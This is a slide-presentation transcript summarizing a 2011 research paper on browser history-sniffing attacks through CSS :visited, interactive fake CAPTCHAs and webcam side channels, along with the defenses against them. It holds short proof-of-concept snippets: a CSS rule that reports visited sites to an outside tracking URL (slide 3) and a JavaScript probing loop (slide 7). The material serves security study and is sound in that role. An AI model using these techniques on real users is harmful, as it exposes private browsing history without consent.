1 / 30

I Still Know What You Visited Last Summer : User interaction and side-channel attacks on browsing history

I Still Know What You Visited Last Summer : User interaction and side-channel attacks on browsing history. Zachary Weinberg Eric Y. Chen Pavithra Ramesh Jayaraman Collin Jackson Carnegie Mellon University. IEEE Symposium on Security and Privacy, May 2011. Outline. Introduction

job
Download Presentation

I Still Know What You Visited Last Summer : User interaction and side-channel attacks on browsing history

An Image/Link below is provided (as is) to download presentation Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author. Content is provided to you AS IS for your information and personal use only. Download presentation by click this link. While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server. During download, if you can't get a presentation, the file might be deleted by the publisher.

E N D

Presentation Transcript

  1. I Still Know What You Visited Last Summer: User interaction and side-channel attacks on browsing history Zachary Weinberg Eric Y. Chen PavithraRameshJayaraman Collin Jackson Carnegie Mellon University IEEE Symposium on Security and Privacy, May 2011

  2. Outline Introduction Automated Attacks Exp 1: Interactive Attacks Exp 2: Side-Channel Attacks Related Work Conclusion

  3. Introduction • History Sniffing through CSS :visited • Andrew Clover, 2002, http://seclists.org/bugtraq/2002/Feb/271 in HTML <a id="link1" href="http://google.com/">Visit Google!</a> in CSS #link1:visited { color: red; background: url(http://140.115.53.28/track.php?url=google.com); }

  4. Introduction • L. David Baron, 2010, http://dbaron.org/mozilla/visited-privacy • make getComputedStyle act as though all links are unvisited • make certain CSS selectors act as though links are always unvisited • limits the CSS properties that can be used to style visited links to color, background-color, border-*-color, outline-color, column-rule-color, fill, and stroke • The latest versions of Firefox, Chrome, Safari, and IE all adopt this defense • still vulnerable with interactive attacks

  5. Introduction • Dongseok Jang et al., An Empirical Study of Privacy-Violating Information Flows in JavaScript Web Applications • Small sets of links (6~220) probed by real exploiters • 46 popular websites, including one from Alexa Top100 This makes interactive attacks possible

  6. Introduction • What can history sniffers do? • Benign: • Websites could use history sniffing to determine whether their users have visited known phishing sites. • Websites could seed visitors’ history with URLs made up for the purpose, and use the URLs to re-identify their visitors. • Cookies • Malicious: • Track visitors across sites for advertising purpose, determining whether they also visit a site’s competitors. • Attackers can construct more targeted phishing pages, by impersonating only sites that a particular victim is known to visit

  7. Automated Attacks • Direct sniffing <style> a:visited { color: red; } </style> varurl_array = new Array('http://a.com', 'http://b.com'); varvisited_array = new Array(); varlink_el = document.createElement('a'); varcomputed_style = document.defaultView.getComputedStyle(link_el, ""); for (vari = 0; i < url_array.length; i++) { link_el.href = array[i]; if (computed_style.getPropertyValue("color") == 'rgb(255, 0, 0)'){ visited_array.push(url_array[i]); } }

  8. Automated Attacks • Indirect Sniffing • Make visited and unvisited links take different amounts of space, which causes unrelated elements on the page to move; inspect the positions of those other elements. • Make visited and unvisited links cause different images to load. • background-image style used in :visited rule • Not requires JavaScript

  9. Automated Attacks • Side-channel sniffing • Timing attacks • the attacker can make the page take longer to lay out if a link is visited than if it is unvisited • Transparent • Underline • Any other style rules in :visited • Defense • Baron’s solution does well for all 3 types (direct/indirect/side-channel) above

  10. Exp 1: Interactive Attacks • Require victims to interact with malicious sites • The authors claim that interactive attacks can be disguised as “normal” interactive tasks that users will not find surprising or suspicious • Amazon’s Mechanical Turk • Recruit 307 participants • All tasks in this experiment operate within the constraints of Baron’s defense • Visited-link styles only change the color on the screen • Pretend to be CAPTCHA tests • CAPTCHA: Completely Automated Public Turing test to tell Computers and Humans Apart

  11. Exp 1: Interactive Attacks • Word CAPTCHA • Each word is a hyperlink to an URL that the attacker wishes to probe • If unvisited, it is drawn in the same color as the background.

  12. Exp 1: Interactive Attacks • Character CAPTCHA • Seven-segment LCD symbols • Every letter represents 3 URLs • Site-supplied font

  13. Exp 1: Interactive Attacks • 4 + 5 = 9 ; 4 + F = A ; 5 + F = 6 ; 4 + 5 + F = 8 • “ – “ is always-on

  14. Exp 1: Interactive Attacks • Chessboard puzzle • Each square contains a URL • Only the pawns corresponding to visited sites are made visible • Using SVG or text to control the pawns

  15. Exp 1: Interactive Attacks Pattern matching puzzle

  16. Exp 1: Interactive Attacks Randomly generated task instances corresponding to known proportions of visited and unvisited links.

  17. Exp 1: Interactive Attacks • Automated history-sniffing exploits on all the participants • URL set from wtikay.com • 7012 commonly visited URLs (from Alexa Top 5000)

  18. Exp 1: Interactive Attacks

  19. Exp 1: Interactive Attacks

  20. Exp 1: Interactive Attacks

  21. Exp 1: Interactive Attacks

  22. Exp 1: Interactive Attacks

  23. Exp 2: Side-channel Attacks • Webcam attacks • <blink> • Random 20 URLs with 10 visited ones • Variant 1: • Designed to comply with the WCAG standard for seizure safety • Variant 2: • Make entire browser window flash • Brighter color

  24. Exp 2: Side-channel Attacks • Author test • 100% accuracy for both variants in all condition • Will-lit room • Person stays still in front of the computer • In a dark room, accuracy dropped to 50% • Field test • 60 / 307 participants

  25. Exp 2: Side-channel Attacks Field test

  26. Exp 2: Side-channel Attacks • In real life, • ChatRouletteservice • The attack works even when the closest reflector is a wall 10 to 20 feet away from the monitor

  27. Related Work • Page cache • Felten et al., Timing Attacks on Web Privacy • DNS cache • Felten et al., Timing Attacks on Web Privacy • Both tactics above • Only for the first time • Short-term history • Loadable cross-origin but only available to logged-in users • Facebook, Gmail, Twitter, etc. • JavaScript onerror event

  28. Related Work Cookie, Flash Player local shared objects Ad-blocker, Private browsing mode

  29. Conclusion • Automated history sniffing attacks have successfully been blocked by Baron’s solution • Interactive attacks are not • This paper developed POC of 6 history sniffing exploited against Baron’s defense • 4 interactive attacks • 2 detection of the screen through webcam

More Related